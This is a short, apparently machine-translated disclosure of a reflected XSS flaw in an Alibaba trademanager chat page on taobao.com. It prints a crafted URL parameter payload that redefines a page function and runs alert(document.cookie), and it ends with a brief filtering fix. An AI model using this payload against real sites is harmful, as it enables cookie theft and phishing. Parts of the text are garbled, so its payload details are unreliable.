Startup page reflective XSS of an Alibaba trademanager Program

The page has parameters that are not filtered. xss is supported. Cookie is not good for httponly, but this link is trusted and widely used. It is highly risky to use it for phishing, Trojans, or other things. When browsing a site, see Ali trademanager Chat link (uid here is replaced with ***) http://amos1.taobao.com/msg.ww? Site = cntaobao & charset = UTF-8 & v = 2 & uid = *** & s = 1 else.jpg. view the source code and find the following two sentences: try to change uid to a character with quotation marks, and the page will not return content. The charset v s parameters of other parameters are url encoded. SendClientMsg ('','', 'cntaobao', '***', 1, '& charset = % 75% 74% 2D % 38 & v = % 32 & s = % 31'); setTimeout ('windowclose () ', 1 ); try to add the parameter & x = 123, and the function changes to: Construct the following parameter, and the js error is found, it feels like: site = cntaobao & charset = UTF-8 & v = 2 & uid = *** & s = 1 & 'HTTP: // amos1.taobao.com/msg.aw? Site = & v = & uid = 1 & s = & '); function % 20 sendClientMsg () {} alert (document. cookie); // execute: sendClientMsg ('', '1', 1, '& v = & s = &'); function sendClientMsg () {} alert (document. cookie); // = '); setTimeout ('windowclose ()', 1); redefines sendClientMsg to prevent the original logic execution; add // at the end and comment out the closed window later.Solution:

Only the required parameters are retained and filtered out.